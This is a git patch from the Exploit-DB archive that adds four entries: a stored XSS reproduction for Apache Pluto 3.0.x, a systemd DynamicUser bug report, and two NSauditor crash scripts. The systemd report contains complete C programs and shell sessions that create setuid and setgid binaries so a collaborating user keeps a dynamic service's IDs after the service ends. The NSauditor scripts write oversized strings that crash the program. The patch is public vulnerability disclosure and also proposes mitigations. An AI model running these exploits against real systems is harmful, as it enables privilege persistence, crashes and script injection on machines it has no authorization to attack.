From be3b22b6f7af75fcbaef395812138e265bee4df5 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Sat, 27 Apr 2019 05:02:04 +0000
Subject: [PATCH] DB: 2019-04-27

4 changes to exploits/shellcodes

NSauditor 3.1.2.0 - 'Community' Denial of Service (PoC)
NSauditor 3.1.2.0 - 'Name' Denial of Service (PoC)
systemd - DynamicUser can Create setuid Binaries when Assisted by Another Process

Apache Pluto 3.0.0 / 3.0.1 - Persistent Cross-Site Scripting
---
 exploits/java/webapps/46759.txt |  31 ++++
 exploits/linux/dos/46760.txt    | 305 ++++++++++++++++++++++++++++++++
 exploits/windows/dos/46757.py   |  22 +++
 exploits/windows/dos/46758.py   |  23 +++
 files_exploits.csv              |   4 +
 5 files changed, 385 insertions(+)
 create mode 100644 exploits/java/webapps/46759.txt
 create mode 100644 exploits/linux/dos/46760.txt
 create mode 100755 exploits/windows/dos/46757.py
 create mode 100755 exploits/windows/dos/46758.py

diff --git a/exploits/java/webapps/46759.txt b/exploits/java/webapps/46759.txt
new file mode 100644
index 000000000..96a00e916
--- /dev/null
+++ b/exploits/java/webapps/46759.txt
@@ -0,0 +1,31 @@
+Exploit Title: Stored XSS
+# Date: 25-04-2019
+# Exploit Author: Dhiraj Mishra
+# Vendor Homepage: https://portals.apache.org/pluto
+# Software Link: https://portals.apache.org/pluto/download.html
+# Version: 3.0.0, 3.0.1
+# Tested on: Ubuntu 16.04 LTS
+# CVE: CVE-2019-0186
+# References:
+# https://nvd.nist.gov/vuln/detail/CVE-2019-0186
+# https://portals.apache.org/pluto/security.html
+# https://www.inputzero.io/2019/04/apache-pluto-xss.html
+
+Summary:
+The "Chat Room" portlet demo that ships with the Apache Pluto Tomcat bundle
+contains a Cross-Site Scripting (XSS) vulnerability. Specifically, if an
+attacker can input raw HTML markup into the "Name" or "Message" input
+fields and submits the form, then the inputted HTML markup will be embedded
+in the subsequent web page.
+
+Technical observation:
+- Start the Apache Pluto Tomcat bundle
+- Visit http://localhost:8080/pluto/portal/Chat%20Room%20Demo
+- In the name field, enter:
+     <input type="text" value="Name field XSS></input>
+- Click Submit
+- In the message field, enter:
+     <input type="text" value="Message field XSS></input>
+
+Patch:
+3.0.x users should upgrade to 3.1.0
\ No newline at end of file
diff --git a/exploits/linux/dos/46760.txt b/exploits/linux/dos/46760.txt
new file mode 100644
index 000000000..2b9381a69
--- /dev/null
+++ b/exploits/linux/dos/46760.txt
@@ -0,0 +1,305 @@
+This bug report describes a bug in systemd that allows a service with
+DynamicUser in collaboration with another service or user to create a setuid
+binary that can be used to access its UID beyond the lifetime of the service.
+This bug probably has relatively low severity, given that there aren't many
+services yet that use DynamicUser, and the requirement of collaboration with
+another process limits the circumstances in which it would be useful to an
+attacker further; but in a system that makes heavy use of DynamicUser, it would
+probably have impact.
+
+<https://www.freedesktop.org/software/systemd/man/systemd.exec.html#DynamicUser=>
+says:
+
+    In order to allow the service to write to certain directories, they have to
+    be whitelisted using ReadWritePaths=, but care must be taken so that UID/GID
+    recycling doesn't create security issues involving files created by the
+    service.
+
+While I was chatting about DynamicUser with catern on IRC, I noticed that
+DynamicUser doesn't isolate the service from the rest of the system in terms of
+UNIX domain sockets; therefore, if a collaborating user passes a file descriptor
+to a world-writable path outside the service's mount namespace into the
+service, the service can then create setuid files that can be used by the
+collaborating user beyond the lifetime of the service.
+
+
+To reproduce:
+
+As a user:
+======================================================================
+user@deb10:~$ mkdir systemd_uidleak
+user@deb10:~$ cd systemd_uidleak
+user@deb10:~/systemd_uidleak$ cat > breakout_assisted.c
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <sys/socket.h>
+#include <sys/un.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <err.h>
+
+int main(void) {
+  setbuf(stdout, NULL);
+
+  // prepare unix domain socket
+  int s = socket(AF_UNIX, SOCK_DGRAM, 0);
+  if (s < 0) err(1, "unable to create unix domain socket");
+  struct sockaddr_un addr = {
+    .sun_family = AF_UNIX,
+    .sun_path = "\0breakout"
+  };
+  if (bind(s, (struct sockaddr *)&addr, sizeof(sa_family_t)+1+8))
+    err(1, "unable to bind abstract socket");
+  puts("waiting for connection from outside the service...");
+
+  // receive fd to somewhere under the real root
+  int len = sizeof(struct cmsghdr) + sizeof(int);
+  struct cmsghdr *hdr = alloca(len);
+  struct msghdr msg = {
+    .msg_control = hdr,
+    .msg_controllen = len
+  };
+  if (recvmsg(s, &msg, 0) < 0) err(1, "unable to receive fd");
+  if (hdr->cmsg_len != len || hdr->cmsg_level != SOL_SOCKET
+      || hdr->cmsg_type != SCM_RIGHTS)
+    errx(1, "got bad message");
+  puts("got rootfd from other chroot...");
+  if (fchdir(*(int*)CMSG_DATA(hdr))) err(1, "unable to change into real root");
+  char curpath[4096];
+  if (!getcwd(curpath, sizeof(curpath))) err(1, "unable to getpath()");
+  printf("chdir successful, am now in %s\n", curpath);
+
+  // create suid file
+  int src_fd = open("suid_src", O_RDONLY);
+  if (src_fd == -1) err(1, "open suid_src");
+  int dst_fd = open("suid_dst", O_RDWR|O_CREAT|O_EXCL, 0644);
+  if (dst_fd == -1) err(1, "open suid_dst");
+
+  while (1) {
+    char buf[1000];
+    ssize_t res = read(src_fd, buf, sizeof(buf));
+    if (res == -1) err(1, "read");
+    if (res == 0) break;
+    ssize_t res2 = write(dst_fd, buf, res);
+    if (res2 != res) err(1, "write");
+  }
+
+  if (fchmod(dst_fd, 04755)) err(1, "fchmod");
+  close(src_fd);
+  close(dst_fd);
+
+  // and that's it!
+  puts("done!");
+  while (1) pause();
+  return 0;
+}
+user@deb10:~/systemd_uidleak$ gcc -o breakout_assisted breakout_assisted.c 
+user@deb10:~/systemd_uidleak$ cat > breakout_helper.c
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <fcntl.h>
+#include <sys/socket.h>
+#include <sys/un.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <err.h>
+
+int main(void) {
+  int rootfd = open(".", O_PATH);
+  if (rootfd < 0) err(1, "unable to open cwdfd");
+  int s = socket(AF_UNIX, SOCK_DGRAM, 0);
+  if (s < 0) err(1, "unable to create unix domain socket");
+  struct sockaddr_un addr = {
+    .sun_family = AF_UNIX,
+    .sun_path = "\0breakout"
+  };
+  if (connect(s, (struct sockaddr *)&addr, sizeof(sa_family_t)+1+8))
+    err(1, "unable to connect to abstract socket");
+  puts("connected to other chroot, sending cwdfd...");
+
+  int len = sizeof(struct cmsghdr) + sizeof(int);
+  struct cmsghdr *hdr = alloca(len);
+  *hdr = (struct cmsghdr) {
+    .cmsg_len = len,
+    .cmsg_level = SOL_SOCKET,
+    .cmsg_type = SCM_RIGHTS
+  };
+  *(int*)CMSG_DATA(hdr) = rootfd;
+  struct msghdr msg = {
+    .msg_control = hdr,
+    .msg_controllen = len
+  };
+  if (sendmsg(s, &msg, 0) < 0) err(1, "unable to send fd");
+  puts("all ok on this side!");
+  return 0;
+}
+user@deb10:~/systemd_uidleak$ gcc -o breakout_helper breakout_helper.c 
+user@deb10:~/systemd_uidleak$ cp /usr/bin/id suid_src
+user@deb10:~/systemd_uidleak$ chmod 0777 .
+user@deb10:~/systemd_uidleak$ ls -la .
+total 100
+drwxrwxrwx  2 user user  4096 Feb  4 21:22 .
+drwxr-xr-x 23 user user  4096 Feb  4 21:19 ..
+-rwxr-xr-x  1 user user 17432 Feb  4 21:20 breakout_assisted
+-rw-r--r--  1 user user  1932 Feb  4 21:20 breakout_assisted.c
+-rwxr-xr-x  1 user user 16872 Feb  4 21:22 breakout_helper
+-rw-r--r--  1 user user  1074 Feb  4 21:22 breakout_helper.c
+-rwxr-xr-x  1 user user 43808 Feb  4 21:22 suid_src
+user@deb10:~/systemd_uidleak$ 
+======================================================================
+
+Then, as root, create and launch a service around breakout_assisted:
+======================================================================
+root@deb10:/home/user# cat > /etc/systemd/system/dynamic-user-test.service
+[Service]
+ExecStart=/home/user/systemd_uidleak/breakout_assisted
+DynamicUser=yes
+root@deb10:/home/user# systemctl daemon-reload
+root@deb10:/home/user# systemctl start dynamic-user-test.service
+root@deb10:/home/user# systemctl status dynamic-user-test.service
+[...]
+Feb 04 21:27:29 deb10 systemd[1]: Started dynamic-user-test.service.
+Feb 04 21:27:29 deb10 breakout_assisted[3155]: waiting for connection from outside the service...
+root@deb10:/home/user# 
+======================================================================
+
+Now again as a user, run the breakout_helper:
+======================================================================
+user@deb10:~/systemd_uidleak$ ./breakout_helper 
+connected to other chroot, sending cwdfd...
+all ok on this side!
+user@deb10:~/systemd_uidleak$ ls -la
+total 144
+drwxrwxrwx  2 user  user   4096 Feb  4 21:28 .
+drwxr-xr-x 23 user  user   4096 Feb  4 21:19 ..
+-rwxr-xr-x  1 user  user  17432 Feb  4 21:20 breakout_assisted
+-rw-r--r--  1 user  user   1932 Feb  4 21:20 breakout_assisted.c
+-rwxr-xr-x  1 user  user  16872 Feb  4 21:22 breakout_helper
+-rw-r--r--  1 user  user   1074 Feb  4 21:22 breakout_helper.c
+-rwsr-xr-x  1 64642 64642 43808 Feb  4 21:28 suid_dst
+-rwxr-xr-x  1 user  user  43808 Feb  4 21:22 suid_src
+user@deb10:~/systemd_uidleak$ ./suid_dst 
+uid=1000(user) gid=1000(user) euid=64642 groups=1000(user),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(lpadmin),113(scanner)
+user@deb10:~/systemd_uidleak$ 
+======================================================================
+
+
+On fixing this:
+
+catern suggested that it might be more robust to use seccomp() to block
+chmod()/fchmod() calls with modes that include setuid/setgid bits, like the
+Nix build process. See
+<https://nixos.org/releases/nix/nix-2.1.3/manual/#ssec-relnotes-1.11.10>:
+
+> To prevent this issue, Nix now disallows builders to create setuid and setgid
+> binaries. On Linux, this is done using a seccomp BPF filter.
+
+This seems like the least intrusive fix to me. As far as I can tell, it should
+be sufficient to prevent the creation of setuid binaries that are reachable
+beyond the death of the service. Unfortunately, for setgid files, the following
+trick also needs to be mitigated, assuming that the distribution hasn't blocked
+the unprivileged creation of user namespaces:
+
+======================================================================
+user@deb10:~/systemd_uidleak_gid$ cat map_setter.c
+#include <unistd.h>
+#include <fcntl.h>
+#include <err.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+static void write_file(char *type, int pid, char *buf) {
+  char file_path[100];
+  sprintf(file_path, "/proc/%d/%s", pid, type);
+  int fd = open(file_path, O_WRONLY);
+  if (fd == -1) err(1, "open %s", file_path);
+  if (write(fd, buf, strlen(buf)) != strlen(buf))
+    err(1, "write %s", type);
+  close(fd);
+}
+
+static void write_map(char *type, int pid, int upper, int lower) {
+  char buf[100];
+  sprintf(buf, "%d %d 1", upper, lower);
+  write_file(type, pid, buf);
+}
+
+int main(void) {
+  FILE *pid_file = fopen("/home/user/systemd_uidleak_gid/pid_file", "r");
+  if (pid_file == NULL) err(1, "open pid_file");
+  int pid;
+  if (fscanf(pid_file, "%d", &pid) != 1) err(1, "fscanf");
+
+  write_file("setgroups", pid, "deny");
+  write_map("gid_map", pid, 0, getgid());
+  write_map("uid_map", pid, 0, geteuid());
+  puts("done");
+  while (1) pause();
+  return 0;
+}
+user@deb10:~/systemd_uidleak_gid$ cat sgid_maker.c
+#define _GNU_SOURCE
+#include <sched.h>
+#include <err.h>
+#include <unistd.h>
+#include <string.h>
+#include <fcntl.h>
+#include <stdio.h>
+#include <sys/stat.h>
+int main(void) {
+  if (unshare(CLONE_NEWUSER)) err(1, "unshare CLONE_NEWUSER");
+  pid_t my_pid = getpid();
+  char my_pid_str[20];
+  sprintf(my_pid_str, "%d\n", (int)my_pid);
+  int pid_file = open("pid_file", O_WRONLY|O_CREAT|O_TRUNC, 0644);
+  if (pid_file == -1) err(1, "create pid_file");
+  if (write(pid_file, my_pid_str, strlen(my_pid_str)) != strlen(my_pid_str)) err(1, "write pid_file");
+  close(pid_file);
+  puts("pid file written, waiting for mappings...");
+  while (1) {
+    if (getuid() == 0) break;
+    sleep(1);
+  }
+  puts("mappings are up!");
+  if (setgid(0)) err(1, "setgid");
+
+  // create sgid file
+  int src_fd = open("sgid_src", O_RDONLY);
+  if (src_fd == -1) err(1, "open sgid_src");
+  int dst_fd = open("sgid_dst", O_RDWR|O_CREAT|O_EXCL, 0644);
+  if (dst_fd == -1) err(1, "open sgid_dst");
+  while (1) {
+    char buf[1000];
+    ssize_t res = read(src_fd, buf, sizeof(buf));
+    if (res == -1) err(1, "read");
+    if (res == 0) break;
+    ssize_t res2 = write(dst_fd, buf, res);
+    if (res2 != res) err(1, "write");
+  }
+  if (fchmod(dst_fd, 02755)) err(1, "fchmod");
+  close(src_fd);
+  close(dst_fd);
+}
+user@deb10:~/systemd_uidleak_gid$ cp /usr/bin/id sgid_src
+user@deb10:~/systemd_uidleak_gid$ gcc -o map_setter map_setter.c && gcc -o sgid_maker sgid_maker.c && chmod u+s map_setter && ./sgid_maker 
+pid file written, waiting for mappings...
+[#####  at this point, launch ~/systemd_uidleak_gid/map_setter in a systemd service  #####]
+mappings are up!
+user@deb10:~/systemd_uidleak_gid$ ls -l sgid_dst
+-rwxr-sr-x 1 user 64642 43808 Feb  4 23:13 sgid_dst
+user@deb10:~/systemd_uidleak_gid$ ./sgid_dst
+uid=1000(user) gid=1000(user) egid=64642 groups=64642,24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(lpadmin),113(scanner),1000(user)
+user@deb10:~/systemd_uidleak_gid$ 
+======================================================================
+
+I think the least intrusive way to mitigate this part might be to enforce
+NoNewPrivileges=yes for services with dynamic IDs - that way, someone inside
+such a service can't become capable over anything outside, and someone outside
+the service can't become capable over anything inside the service.
+(And really, in general, it would be nice if NoNewPrivileges=yes could become
+the norm at some point.)
\ No newline at end of file
diff --git a/exploits/windows/dos/46757.py b/exploits/windows/dos/46757.py
new file mode 100755
index 000000000..ab86172d0
--- /dev/null
+++ b/exploits/windows/dos/46757.py
@@ -0,0 +1,22 @@
+#Exploit Title: NSauditor 3.1.2.0 - 'Community' Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-04-24
+#Vendor Homepage: www.nsauditor.com 
+#Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe
+#Tested Version: 3.1.2.0
+#Tested on: Windows 7 x64 Service Pack 1
+ 
+#Steps to produce the crash:
+#1.- Run python code: Nsauditor_3.1.2.0.py
+#2.- Open nsauditor.txt and copy content to clipboard
+#3.- Open Nsauditor
+#4.- In Sessions select "SNMP Auditor"
+#5.- Select "Community" field paste Clipboard
+#6.- Click "Walk"
+#7.- Crarshed
+ 
+cod = "\x41" * 10000
+ 
+f = open('nsauditor.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46758.py b/exploits/windows/dos/46758.py
new file mode 100755
index 000000000..98df8c83f
--- /dev/null
+++ b/exploits/windows/dos/46758.py
@@ -0,0 +1,23 @@
+#Exploit Title: NSauditor 3.1.2.0 - 'Name' Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-04-24
+#Vendor Homepage: www.nsauditor.com 
+#Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe
+#Tested Version: 3.1.2.0
+#Tested on: Windows 7 x64 Service Pack 1
+
+#Steps to produce the crash:
+#1.- Run python code: Nsauditor_name.py
+#2.- Open nsauditor_name.txt and copy content to clipboard
+#3.- Open Nsauditor
+#4.- Select "Register"
+#5.- In "Name" paste Clipboard
+#6.- In Key type "test"
+#7.- Click "Ok"
+#8.- Crarshed
+ 
+cod = "\x41" * 300
+ 
+f = open('nsauditor_name.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 50b42553c..719caa22d 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6402,6 +6402,9 @@ id,file,description,date,author,type,platform,port
 46750,exploits/windows/dos/46750.py,"Backup Key Recovery 2.2.4 - Denial of Service (PoC)",2019-04-25,"Victor Mondragón",dos,windows,
 46752,exploits/hardware/dos/46752.txt,"JioFi 4G M2S 1.0.2 - Denial of Service",2019-04-25,"Vikas Chaudhary",dos,hardware,
 46754,exploits/windows/dos/46754.py,"AnMing MP3 CD Burner 2.0 - Denial of Service (PoC)",2019-04-25,Achilles,dos,windows,
+46757,exploits/windows/dos/46757.py,"NSauditor 3.1.2.0 - 'Community' Denial of Service (PoC)",2019-04-26,"Victor Mondragón",dos,windows,
+46758,exploits/windows/dos/46758.py,"NSauditor 3.1.2.0 - 'Name' Denial of Service (PoC)",2019-04-26,"Victor Mondragón",dos,windows,
+46760,exploits/linux/dos/46760.txt,"systemd - DynamicUser can Create setuid Binaries when Assisted by Another Process",2019-04-26,"Google Security Research",dos,linux,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -41189,3 +41192,4 @@ id,file,description,date,author,type,platform,port
 46741,exploits/php/webapps/46741.txt,"UliCMS 2019.2 / 2019.1 - Multiple Cross-Site Scripting",2019-04-22,"Kağan EĞLENCE",webapps,php,80
 46751,exploits/hardware/webapps/46751.txt,"JioFi 4G M2S 1.0.2 - 'mask' Cross-Site Scripting",2019-04-25,"Vikas Chaudhary",webapps,hardware,
 46753,exploits/php/webapps/46753.txt,"osTicket 1.11 - Cross-Site Scripting / Local File Inclusion",2019-04-25,AkkuS,webapps,php,80
+46759,exploits/java/webapps/46759.txt,"Apache Pluto 3.0.0 / 3.0.1 - Persistent Cross-Site Scripting",2019-04-26,"Dhiraj Mishra",webapps,java,